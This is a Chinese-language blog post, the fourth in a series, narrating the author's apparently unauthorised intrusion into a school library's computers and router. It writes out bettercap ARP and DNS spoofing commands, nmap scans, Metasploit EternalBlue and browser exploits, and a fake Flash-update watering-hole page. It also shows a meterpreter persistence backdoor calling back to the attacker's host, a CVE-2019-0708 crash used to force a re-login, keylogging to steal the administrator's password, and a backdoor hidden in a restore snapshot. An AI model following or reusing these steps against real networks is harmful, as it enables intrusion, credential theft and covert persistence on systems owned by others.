/文章作者:Kali_MG1937
CSDN博客:ALDYS4
QQ:3496925334
未經許可,禁止轉載/
第四期:【滲透實戰】記一次艱難的內網漫遊第四期_蹭我WIFI?看我如何利用組合拳日進蹭網者內網
第二期:【滲透實戰】記一次艱難的內網漫遊第二期_我是如何讓管理員乖乖交出監控權限的
學校新開了一個閱讀廣場
先進去做個滲透測試吧
0x00信息收集
先了解圖書館的佈局
如圖所示,圖書館內有8臺學生用機和一臺管理員的機子
而使用電腦的地方正好是管理員的視線盲區
我選定了一個最佳的位置進行操作,如圖綠色標記處
瞭解圖書館的開放時間:
中午11:30-13:45 有將近兩個小時的操作時間,但是人也很多
下午17:30-18:15 有近一個小時的操作時間,不過這一個小時人很少
基本信息瞭解後就得考慮攻擊方案了
首先是針對學校的系統鏡像:
不管怎樣,學校一定會選取win7作爲系統鏡像
所以就可以碰碰運氣,
比如ms17010
IE瀏覽器漏洞CVE-2012-1875等等
但是需要注意:學校給管理員和用戶機安裝的win7鏡像是不一樣的
從何而知?我在第一次針對學校的內網漫遊時我已經拿到了和信系統的管理權限,
並且知道在和信系統內有對鏡像的區分,詳看我的第一次內網漫遊記錄:
【滲透實戰】記一次艱難的內網漫遊之旅_拿下472臺主機shell!
0x01權限維持
既然是圖書館,電腦用的人很多也很搶手
所以權限維持首先就要保證自己的機子能夠使用
如何維持?
試想一下,如果圖書館裏一臺電腦,你沒法上網,沒法打開任何應用程序
那你會怎麼做?大多數人都會試着修復電腦,若幾分鐘無果後就會下機
這樣機子不就空出來了麼
但在進行操作前還有一個問題:
學生用機統一安裝了冰點還原軟件
可以碰運氣去試試網上的冰點還原密碼破解軟件(偶爾還是噹噹腳本小子吧 )
首先使用冰點還原的熱鍵:Ctrl+Alt+F6把那隻北極熊召喚出來
然而在這個圖書館裏,你甚至連密碼破解軟件都不需要
這個圖書館連接的是無線網絡,那麼查看無線網絡密碼a12345678
條件反射地在冰點軟件密碼輸入處也輸入無線網絡的密碼
登入成功…
我已經懶得吐槽了,仍然是密碼唯一性這個死不悔改的問題…
得到控制權後先解凍硬盤,然後利用本地安全策略中的軟件限制策略限制了某些關鍵的應用程序
比如QQ和IE瀏覽器
接下來這臺電腦的QQ和IE這兩個主要的外網訪問通道就沒有了,
中午來的時候一看,周圍的電腦全被佔用,只有我那臺空着,看來成功了
0x02內網漏洞發掘
權限問題搞定後就從U盤啓動我的linux
這裏先說一下
這個閱讀廣場的路由器會監控使用者的使用時長,若使用超過10分鐘就會鎖定5分鐘,
因爲win7策略限制無法更改ip,所以我使用linux時就得頻繁更換地址
既然這種策略影響我玩電腦的話,就得先攻破路由器了
先查看本機的網絡信息
打開路由管理界面
銳捷路由器,也就是我第一次內網漫遊時攻破的路由器
嘗試口令admin,無線密碼a12345678和各種弱口令後均登入失敗
在第一次漫遊時發現的登入繞過漏洞也沒用
在多次硬碰硬後最終無果,看來只能從別的地方下手了
0x03旁敲側擊
既然沒法直接進入路由器,那就從管理員下手,
基於第一次攻擊,我已經拿到全校教師的職位和身份,經過對比,
這個圖書館管理員正是信息安全組的其中一位教師
我要是和以前一樣,走過去給他遞一個U盤,或者騙他下載一個軟件去運行,那我 包死
先找找管理員的網絡地址,看看有什麼線索
本機的子網掩碼是255.255.0.0
這就意味着路由器可分配254*254個地址,看來直接找管理員的地址是大海撈針了
再看看連上的無線網絡,和教師辦公樓的網絡是同一個
這就更難下手了,如果我操作不慎教師辦公室可能也會遭殃,到時候就查到我頭上來了
那麼就換一種思路,下午圖書館也有一個小時的開館時間
而且這個時候教師基本上都會走光,可是圖書館仍然有學生
那就嗅探這個時間段的流量,以此確定圖書館網絡地址的具體分佈情況
輪到bettercap上場
bettercap -X
除去一些連上網絡的手機,基本可以知道
在這個時間的,只有下面這個ip段還有流量發出
192.168.2.100-200
192.168.3.0-150
這個地址段絕對是圖書館機子所在的地址段
接着通過nmap掃描,
nmap 192.168.2.0/24
nmap 192.168.3.0/24
發現這兩個地址段分別掃描到5個主機和4個主機
正好是9臺主機,也就是圖書館擁有的主機數量
0x04漏洞利用
nmap掃描結果中大部分ip打開445端口,考慮到學生用機的鏡像基本上較老
所以優先考慮存在永恆之藍漏洞的可能
打開metasploit
隨便選一個地址開刀
確實存在永恆之藍漏洞!
總之先劫持他們的屏幕,截個圖看看
怎麼哪裏都有車萬廚啊kora!
看得出來,這絕對不是管理員用機
那麼如何確定管理員用機在哪裏呢?
總不能每個主機的漏洞都利用一遍,然後一個個屏幕看過去吧
注意,學生用機的鏡像和管理員的鏡像是不一樣的
經過觀察,我所在學校和信系統的管理員每隔一段時間都會更新一次鏡像
而管理員鏡像是更新最頻繁的,最新一次更新時間在2019年7月23日
學生用機的鏡像的更新時間停滯在2016年5月
如此頻繁的更新想必是不存在ms17010漏洞
那麼如果找到沒有ms17010漏洞的主機很大可能就是管理員的主機了吧
利用msf的ms17010掃描模塊掃描兩個地址段
掃描完成之後仍然有4個IP是漏洞不可利用的
有兩臺在192.168.3.0-150地址段,還有兩臺在192.168.2.100-200地址段
範圍已經極大限度的縮小了
接下來只要想出對這四個ip可能存在的漏洞進行利用的方法
0x05瀏覽器漏洞利用
雖然還有機子的ms17010漏洞沒法利用,但我們知道管理員用機和學生用機的鏡像是不同的
所以鏡像自帶的IE瀏覽器也可能不同,學生機只自帶IE瀏覽器,管理員用機就不知道了
如果我找到學生機鏡像的ie漏洞就可以通殺至少三臺主機,這樣剩下的就是管理員用機了
這裏利用metasploit的兩個自動化瀏覽器漏洞利用模塊
auxiliary/server/browser_autopwn2
auxiliary/server/browser_autopwn
通過本地虛擬機搭建和測試,最終發現MS14_064瀏覽器利用漏洞是可以利用在學生機上的!
果斷在本地搭建起用於漏洞exploit的服務器,想個辦法讓受害者訪問我的漏洞利用界面
仍然是利用arp欺騙工具bettercap
具體思路:利用bettercap的dns欺騙模塊來使目標機訪問我的服務器,我的服務器最終轉跳至漏洞利用界面
在本地新建一個dns.conf文件,內容如下:
192.168.2.129 .*\.com
啓動bettercap:bettercap -I wlan0 -T [target's ip] -G [gateway's ip] --dns dns.conf --proxy-https
欺騙目標機將所有網頁dns重定向至192.168.2.129,並且在本地建立一個https服務器,導入bettercap自帶的證書,以便目標在訪問https網頁時也被重定向至本機
(下面這張圖是因爲我的IP地址改動了,所以有所不同)
終於,有地址反彈了shell
不出我所料,有三臺主機反彈了shell,還有一臺訪問了我的服務器卻沒有利用成功,那麼這一臺可以肯定就是管理員用機了
管理員用機IP:192.168.2.200
0x06水坑攻擊
先用nmap掃描
沒有任何端口打開,當然也不排除是防火牆阻止了nmap掃描
那怎麼辦?
現在學校的和信系統裏查找這臺主機
注意,在重啓還原這一項裏管理員用機是設置爲重啓還原的
我可以做一個猜想,因爲管理員不希望機子中毒,所以凍結了硬盤,換句話說,管理員用機和學生用機一樣是沒有安裝殺毒軟件的必要的
所以滲透思路還是玩到爛的方法:在本機搭建一個服務器,接着重定向對方所有頁面,誘導目標下載載荷並運行
可是問題來了,這個圖書館的管理員是信息安全組的教師,這種方法絕對會讓管理員起疑心
所以在誘導下載這方面就要多下些功夫了
問題就是:如何讓管理員相信我服務器顯示的內容,並依照提示下載載荷
仍然先嗅探管理員的網絡流量以便信息收集
可以看出管理員一直在訪問騰訊視頻這個網站
那麼思路就有了
看視頻需要什麼插件?Flash插件,對於需要flash支持的網站,flash插件過期或出錯是難免的
所以就需要更新或重新安裝flash插件,如果我僅僅重定向某些視頻網站,將他們轉跳到我的服務器,接着我的服務器提醒管理員需要更新flash插件,那麼管理員上鉤的可能性就大大增加了
啓動Apache2服務器
下載flash官網的首頁
對內容進行一些更改,讓管理員下載我的載荷文件
服務器打開,看看效果
服務器建好了,但是攻擊工具不用之前ruby語言的bettercap,這回我採用官方最新的go語言版本的bettercap
,因爲新版本的bettercap支持用JavaScript編寫http代理模塊,而ruby語言版本的只能用ruby寫
不習慣ruby語法的我自然選新版本的bettercap了
關於如何編寫bettercap代理模塊,我前幾期博客有介紹
【工具解析】瑞士軍刀bettercap2.X解析_第一期_編寫HTTP代理注入模塊_http(s).proxy.script
【工具解析】瑞士軍刀bettercap2.X_解析_第二期_內網釣魚(嗅探)工具編寫
通過分析管理員發送的網絡流量可知,管理員最常上騰訊視頻這個網站
那麼就寫一個腳本,若發現服務器發送給管理員的response中有騰訊視頻的字眼就立刻重寫response,讓管理員訪問我的服務器
啓動bettercap,設置好相應的http代理模塊和arp欺騙對象
set arp.spoof.targets 192.168.2.200
set http.proxy.script 代理文件絕對路徑
set https.proxy.script 代理文件絕對路徑
http.proxy on
https.proxy on
arp.spoof on
幾分鐘後,metasploit上出現了反彈信息
劫持屏幕,截圖回傳
不出所料,沒有看到殺毒軟件
0x07巧用微軟3389漏洞CVE-2019-0708
管理員機子的權限終於拿到了
首先在和信系統裏將管理員機子的重啓還原關閉,在meterpreter下執行命令
run persistence -X -i 10 -r 192.168.2.129 -p 4445
這個模塊將在傀儡機上建立一個持久後門,開機自啓,每10秒就向192.168.2.129這個地址的4445端口回彈shell
暫時能夠維持權限了,可我們的最終目的並不是管理員機子的權限,而是路由器權限
既然拿到管理員權限,那就在管理員的電腦上找找有沒有有用的東西
翻遍了整個機子的硬盤,只有一些關於圖書館建設的內容,還有一個關於系統重裝的文件
按照提示登入ftp後發現確實只有鏡像文件和一個u盤啓動製作工具,其他文件均無訪問權限,
ftp的賬號密碼也沒法登入路由器,仿照密碼構造幾個弱口令也沒法進入路由器,
而密碼ydgc114581僅僅是學校建立圖書館的相關編號,和管理員的個人賬號毫無關係,
這個文件暫時沒有什麼利用價值
不過仔細看看,ftp部署地址是10.10.0.2,和之前第一次漫遊時攻破的sangfor防火牆是相關聯的
圖書館連接的網絡也是學校的辦公網絡,而學校的sangfor防火牆中的策略規定部分教師的電腦每次連接網絡時都要進行單點認證登入
而這臺管理員用機也是需要單點登入的,而部署這個路由器的人正好就是這個管理員
也就是說,我如果能嗅探到管理員單點登入時輸入的信息或許就能猜出路由器的密碼
只要讓管理員斷開網絡就能讓他重新進行認證登入
首先重置網絡
netsh winsock reset
然而netsh命令需要系統管理員權限,那就試試關機,仍然不行
shutdown -r -t 0
通過whoami的信息得知,當前用戶並不是administrator組的用戶
那麼現在的主要目的就是要讓管理員的電腦關機或者重置網絡
分析一下:管理員用機的鏡像是在今年7月更新的,查找離這個時間最近的安全漏洞
是的,CVE-2019-0708於今年5月被發現,但到現在爲止終究沒有可以利用的exp流傳開來
在exploit-db上搜索此漏洞
發現有兩個關於這個漏洞的利用腳本,功能都是讓主機藍屏,那就試試看管理員的機子有沒有這種漏洞吧
先加載getgui模塊讓管理員的機子開啓3389端口
run getgui -e
接着下載第一個ruby腳本並導入metasploit
exploit!
**The host is crashed!**漏洞被成功利用,看看管理員的屏幕,藍藍一片,msf也斷開了連接
接下來在msf重新監聽端口回彈,目標成功上線後啓用鍵盤捕捉模塊
keyscan_start
成功dump到管理員密碼!
利用dump到的密碼登入路由器
啊~久違的管理頁面
0x08後滲透階段-權限維持
現在我已經有了一個可用的持久後門,可是這是在關閉了重啓還原的情況下得到的持久權限
關閉了重啓還原,管理員遲早要察覺到異樣,可是如果開啓還原,電腦就會依據和信系統設置的系統快照恢復電腦,到時候拿到的shell就沒了…
與其說如何讓管理員不察覺到異樣,不如說如何讓電腦還原後仍然存在後門
那就不要用和信系統的還原策略,我記得學校ftp裏有冰點還原和註冊碼,乾脆就用這個凍結管理員的機子,並讓存在後門的系統作爲快照
在管理員不在機子前的時候登入3389,安裝冰點還原
安裝完成後凍結硬盤
重啓後msf仍然能接受到shell,系統也成功依照設置的快照被還原